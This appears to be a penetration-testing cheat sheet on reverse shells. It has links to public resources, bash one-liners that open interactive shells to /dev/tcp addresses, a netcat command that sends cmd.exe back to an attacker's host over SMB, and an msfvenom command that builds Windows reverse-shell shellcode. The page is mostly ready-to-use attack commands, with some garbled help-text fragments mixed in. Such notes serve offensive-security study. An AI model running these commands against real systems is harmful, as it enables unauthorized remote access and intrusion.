Shells
Reverse shells
Links
https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
https://github.com/Tib3rius/rsg/blob/master/shells.txt
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/swisskyrepo/PayloadsAllTheThings
https://cyb3rdan.com/2019/07/01/oscp/
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Shells
/bin/bash -i >& /dev/tcp/10.10.14.20/4444 0>&1
bash -i >& /dev/tcp/192.168.32.31/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1'
bash -c help
' for more information about shell builtin commands. /bin/sh -i
/bin/bash -i
echo os.system('/bin/bash')
-c
cmd : program passed in as string (terminates option list)
Getting a shell in limited interpreters:
system("start cmd.exe /k $cmd") Second shell After getting a shell, get a second shell with "start" in case the first one bugs up/hangs/crashes (assuming running SMB server): victim > start \10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80
Upgrade to full Shell
Msfvenom
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/ https://netsec.ws/?p=331
-p
= payload
-f
= output format
-o
= out
-a
= architecture
-e
= encoder
-i
= iterations of encoder
-b
= bad characters to avoid \x00\xff
--platform
= platform for the payload
Multi/Handler
Create small shellcode msfvenom -p windows/shell_reverse_tcp -a x86 -f python –platform windows LHOST=<ip> LPORT=443 -b “\x00” EXITFUNC=thread –smallest -e x86/fnstenv_mov
Last updated
Was this helpful?